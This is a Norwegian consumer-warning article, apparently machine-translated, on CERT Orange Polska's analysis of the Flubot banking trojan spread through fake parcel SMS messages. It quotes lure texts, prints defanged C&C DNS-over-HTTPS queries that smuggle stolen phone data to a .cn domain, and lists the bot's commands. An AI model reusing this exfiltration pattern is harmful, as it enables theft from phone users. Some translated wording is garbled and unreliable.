Venter du på pakken din? Vær forsiktig med å sende tekstmeldinger siden du kan miste sparepengene dine

CERT Orange Polska advarer: Du kan miste sparepengene dine

Julen nærmer seg med stormskritt. Det er ingen bedre tid for nettkriminelle som prøver å stjele bankpåloggingsopplysningene våre. Et øyeblikks uoppmerksomhet er nok for Flubot til å angripe.

Det er bare noen få dager til jul. Polakker elsker netthandel og ser frem til pakker med gaver til sine kjære. I det enorme volumet av ting å gjøre, er det lett å glemme eller gå glipp av en viktig detalj. Nettkriminelle venter bare på det … og de forårsaker dette ekstra stresset også.

De siste ukene har vi sett en økning i SMS-aktivitet, spesielt en bølge av tekstmeldinger på angivelig klare til å motta, ikke-leverte og funnet pakker. CERT Orange Polska advarer mot denne nyheten. Dette er en del av distribusjonskampanjen Flubot Banking Trojan.

Hvordan ser en SMS med Flubot ut?

CERT Orange Polska viser noen eksempler på SMS-meldinger du må ta hensyn til. Noen av dem avslører feil eller tvilsom tegnsetting, men ikke alle:

  • Ny pakke: js: har blitt * sendt, vennligst spor den på nettstedet vårt; nettsted: https://www.telepolis.pl/artykuly/ap/orange-ostrzega-sms-kurier-logowanie-do-banku
  • Vi har funnet en * augustpakke til deg. Bekreft levering her: https://www.telepolis.pl/artykuly/ap/orange-ostrzega-sms-kurier-logowanie-do-banku
  • Pakken din kan bli forsinket, bekreft levering her https://www.telepolis.pl/artykuly/ap/orange-ostrzega-sms-kurier-logowanie-do-banku
  • Din pakke; DHL kommer! Klikk her https://www.telepolis.pl/artykuly/ap/orange-ostrzega-sms-kurier-logowanie-do-bankuå følge
  • Vi kunne ikke levere pakken din. Alternativer: https://www.telepolis.pl/artykuly/ap/orange-ostrzega-sms-kurier-logowanie-do-banku
  • I dag vil du motta / din pakke * fra Amazon. * Mer informasjon om https://www.telepolis.pl/artykuly/ap/orange-ostrzega-sms-kurier-logowanie-do-banku

Dette er bare noen av eksemplene samlet inn av spesialistene, men jeg synes de viser ideen om svindelen godt. Meldinger sendes fra telefonnumrene til tilfeldige og fullstendig uvitende personer. Det hender at nettkriminelle utgir seg for ekte kurerer i meldingens tekst.

Utseende: CERT Orange Polska: over 3 millioner phishing-angrep. Nye måter å jukse på

Koblingen i nyhetene fører til en ondsinnet applikasjon som inneholder Flubot-trojaneren. Applikasjonene som brukes i denne kampanjen ligner ekte bud-applikasjoner: først FedEx, nå hovedsakelig DHL. Det er også sporadiske lenker til tapte MMS-meldinger.

Hvorfor er Flubot farlig?

Flubot er skadelig programvare (skadelig programvare) som angriper mobile enheter. Hans spesialitet er stjele bankpåloggingsdetaljerenten fra en nettleser eller en bankapp. For dette bruker den et overlegg: det viser formen «over» bankens påloggingsside og fanger deretter opp dataene.

Også en ondsinnet applikasjon velg for SMSDerfor vil nettkriminelle også ha tilgang til engangskoder som brukes til å bekrefte transaksjoner.

Fra brukerens side er det ingen forskjell, for nettbanken fungerer som den skal. Og her er faren: den angrepne personen oppgir påloggingen som på en tallerken og er uvitende om trusselen. Flubot stjeler til og med adresseboken dinå sende SMS til andre personer, også til utenlandske numre. Dette er imidlertid mindre smertefullt enn å miste alle sparepengene dine.

Hvordan forsvare deg selv?

Forsvar mot Flubot er mulig. For det første bør du ikke åpne lenker fra mistenkelige SMS-er og bruke offisielle verktøy for å spore pakkene dine: kurerapplikasjoner fra Google Play eller deres manuelt åpnede sider. Årvåkenhet er den sikreste beskyttelsen mot et cyberangrep.

Hvis du mottar en SMS, er det verdt å kontakte avsenderen og gi dem informasjon om Flubot. CERT Orange Polska ber eiere av infiserte telefoner om å kontakte oss. Ytterligere informasjon vil hjelpe deg bedre å beskytte deg mot fremtidige angrep. Hvis du mistenker at telefonen din er infisert fordi du kan se SMS til ukjente numre på faktureringen, bør du også kontakte spesialister.

Det er verdt å vite at malware på en smart måte sletter sporene sine. Jeg sa ovenfor at før den begynner å stjele bankpåloggingsinformasjon, kan den sende hele adresseboken til en annen infisert telefon. Og slik går kontaktene til telefon A til trojaneren på telefon B. Fra nummer B sendes SMS til kontaktene til bok A. Dette gjør det nesten umulig for noen å motta en SMS på pakken fra vennen sin.

Omfanget av dette angrepet er enormt, vi ser det i systemene våre. Hvis du har mottatt en lignende SMS, ikke klikk på vedlagte lenker! Kontakt teamet mitt på cert.orange.pl. Jeg oppfordrer spesielt de som mistenker at telefonen deres er infisert. Ved en infeksjon anbefaler vi at du tilbakestiller telefonen. Hvis ukjente personer kontakter deg og informerer deg om at du var avsender av tekstene ovenfor, gi oss beskjed

– råder Robert Grabowski, leder av CERT Orange Polska.

Du må kvitte deg med Flubot fra telefonen gjenopprette fabrikkinnstillingene. Det er alltid en god idé å oppdatere programvaren på telefonen for å lukke kjente sikkerhetshull.

Flubot demontert i sine første deler

Det er ikke første gang at CERT Orange Polska advarer mot Flubot. I mars beskrev spesialister en kampanje som spredte skadelig programvare under dekke av FedEx-applikasjoner (for øyeblikket er DHL i bakgrunnen). Den ondsinnede applikasjonen ble deretter lastet ned fra .ro-adresser, men Tyske, japanske, polske, nederlandske og andre adresser er også i bruk.

Den nedlastede applikasjonen har utvidede tillatelser, inkludert lesing av kontakter og lesing, mottak og sending av SMS. Når den er installert, krever den også tilgjengelighet for å tegne modulen «over» bankappskjermen. Funksjoner designet for funksjonshemmede gir applikasjonen en veldig bred kontroll over applikasjonsvinduene. Når en bruker ser en applikasjon som krever så omfattende tillatelser uten god begrunnelse, bør det høres sirener i hodet.

Utseende: Phishing for desinfeksjon av forsendelser, Trusted Profile, vaksinasjoner og WhatsApp. Ny CERT Orange Polska-rapport

Den ondsinnede applikasjonen kan også overta aktivitetene til standard SMS-applikasjonen. Dette er nok et argument for å oppdatere systemet på telefonen. På Android 9 og tidligere kan den gjøre dette uten å spørre om tillatelse… Altså uten brukerens viten.

En applikasjon som inneholder Flubot

Aktivitetene til telefonene infisert av Flubot koordineres av Command & Control-serverne. For å gjøre det vanskeligere å blokkere kommunikasjon, genererer botnettet tilfeldige domener for dem. Tidligere versjoner av Flubot brukte gjeldende dato for dette, men den nåværende (4.9) forenklet denne metoden. Det er imidlertid DNS-tunnelering over HTTPS. De formidler i disse domenene:

dns.google
cloudflare-dns.com
dns.alidns.com
dns.nextdns.io

få kommunikasjon med C&C til å se ut som spørringer til navneserveren. Her er et eksempelspørsmål:

hxxps: //cloudflare-dns.com/dns-query? navn =b2b55293.0.1.IFCEKMRWG5BECNCGG43TIQJSGM4DQOJSHFDEIOBWIZBTOQJUIN
DCAMJZGMXDCOB.ZFYYTAMBOGIYDIIABAAXH6KXP6O7V6BBHXBWRGONSLW2IZHZSK2IHX
TL6KJ7L7I.LPA3SAKACZMBZCR4U7IHV6QV3JQRWUM3LS7UCXHSMB4JCXXDFAT57Z2QHP
EBV6A.G2XTLJJAF7MG4MTE5DNYVBOE.ucbcmjiesrpgrln.cn & type = TXT

Oransje analytikere rapporterer at tegnstrengen b2b55293 er et tilfeldig token generert for hver økt, 0 angir hvilken del av en større melding (her før), 1 og det er informasjon om at det ikke vil være flere deler (2 betyr å vente på svar, 0 betyr at de neste delene kommer). Så kommer en kryptert melding. Etter å ha sendt alle dataene fra smarttelefonen, vil en annen spørring bli sendt, som inneholder et signal som venter på svar og den kodede UUID-en til enheten:

hxxps: //cloudflare-dns.com/dns-query? navn =b2b55293.100.2.IFCEKMRWG5BECNCGG43TIQJSGM4DQOJSHFDEIOBWIZBTOQJ
UINDA.ucbcmjiesrpgrln.cn & type = TXT

Som svar vil C&C-serveren sende en kommando kryptert med den tidligere genererte nøkkelen. Listen over mulige kommandoer inkluderer blant annet avinstallering av applikasjonen, sending av SMS, lesing av kontakter eller deaktivering av Play Protect:

AVINSTALL_APP
CARD_LOCK
SMS_INT_TOGGLE
Å BLOKKERE
SOKKER
UPLOAD_SMS
OPEN_URL
RUN_USSD
DISABLE_PLAY_PROTECT
REFILL_INJECTS
SEND TEKSTMELDING
GET_CONTACTS
RETRY_INJECT

Til slutt et eksempel på hvordan det kan være å jobbe på en infisert telefon når den mottar telefonnumre og tekstmeldinger fra C&C. Du kan se fra tidsstemplene at den sender en ny melding hvert 10. sekund eller så. Dette utrolige tempoet garanterer deg enorm rekkevidde på kort tid. PRODAFT-gruppen nådde C&C-serveren i Spania og estimerte at den gjorde det mulig å infisere rundt 60 000 telefoner på 2 måneder.

SMS-sendingslogger fra Flubot

Videre inkluderer den ondsinnede applikasjonen også en komponent som oppdages som en banker og dermed stjeler innloggingsdetaljene for e-bank. I tidligere versjoner av Flubot observerte eksperter også spørsmål direkte om betalingskortnummeret og CCV-koden, antagelig for å bekrefte alderen.

Mer informasjon, sammen med Flubot-kodeanalyse, kan bli funnet på CERT Orange Polska-nettstedet. Nok en gang anbefaler vi forsiktighet og nøye overvåking av forsendelser før ferien.

Polen er ikke alene. I gjeldende kampanje Flubots tekster kommer til 28 land rundt om i verden. De er: Tyskland, Østerrike, Sveits, Italia, Spania, Storbritannia, Australia, USA, New Zealand, Belgia, Nederland, Tyrkia, Portugal, Romania, Finland, Bulgaria, Hellas, Danmark, Sverige, Norge, Tsjekkia, Slovakia, Polen, Ungarn, Serbia, Kroatia, Bosnia-Hercegovina og Malaysia.

Artikkelen er skrevet i samarbeid med Orange

Bildekilde: Unsplash, CERT Orange Polska

Tekstkilde: CERT Orange Polska, egen.

Rull ned til neste oppføring

Stanford Bone

"Typisk alkoholutøver. Subtilt sjarmerende sosiale medier-elsker. Freelance zombie-forsker. Popkultur-banebryter."

Legg att eit svar

Epostadressa di blir ikkje synleg.